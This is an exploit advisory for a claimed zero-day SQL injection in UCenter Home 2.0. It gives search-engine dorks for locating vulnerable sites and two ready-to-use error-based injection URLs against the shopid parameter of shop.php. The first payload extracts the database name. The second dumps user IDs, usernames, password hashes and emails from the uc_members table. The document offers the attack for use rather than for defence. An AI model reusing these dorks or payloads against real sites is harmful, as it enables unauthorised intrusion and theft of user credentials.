__--==UCenter Home 2.0 -(0day) Remote SQL Injection Vulnerability==--__

*/ Author : KnocKout
*/ Greatz : DaiMon,BARCOD3,RiskY and iranian hackers
*/ Contact: knockoutr@msn.com
*/ Cyber-Warrior.org/CWKnocKout

__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==

Script : UCenter Home
Version : 2.0
Script HomePage : http://u.discuz.net/

__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==

Dork : Powered by UCenter inurl:shop.php?ac=view

Dork 2 : inurl:shop.php?ac=view&shopid=

__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==

Vuln file : Shop.php

Values : (?)ac=view&shopid=

Vulnerability Type : SQL Injection (MySQL Error Based)

Needed Materials : Hex Conversion

__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==

You need the victim database name.

To inject : http://server/shop.php?ac=view&shopid=253 and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,unhex(hex(database())),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1

..

DB : Okay.

Edit the DB : `[TARGET DB NAME]`

Example : 'hiwir1_ucenter'

Edit : Okay.

Use hex conversion and edit your SQL injection exploit.

Exploit Code : http://server/shop.php?ac=view&shopid=253 253 and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,cast(concat(uc_members.uid,0x3a,uc_members.username,0x3a,uc_members.password,0x3a,uc_members.email) as char),0x27,0x7e) FROM `hiwir1_ucenter`.uc_members LIMIT 0,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1